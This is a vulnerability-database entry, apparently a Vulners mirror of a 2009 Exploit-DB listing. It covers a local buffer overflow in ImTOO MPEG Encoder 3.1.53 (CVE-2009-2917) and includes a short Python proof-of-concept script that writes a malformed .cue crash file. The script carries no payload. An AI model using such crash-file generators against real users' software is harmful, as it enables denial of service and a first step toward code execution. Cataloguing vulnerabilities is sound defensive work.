Lucene search
+L

ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)

🗓️ 06 Aug 2009 00:00:00Reported by opt!x hackerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

ImTOO MPEG Encoder 3.1.53 Local Buffer Overflow (PoC) Python scrip

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2917
6 Aug 200900:00
circl
cve
CVE
CVE-2009-2917
21 Aug 200910:00
cve
cvelist
Cvelist
CVE-2009-2917
21 Aug 200910:00
cvelist
euvd
EUVD
EUVD-2009-2905
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-2917
21 Aug 200911:30
nvd
prion
Prion
Stack overflow
21 Aug 200911:30
prion
#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker <[email protected]> "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.03391
35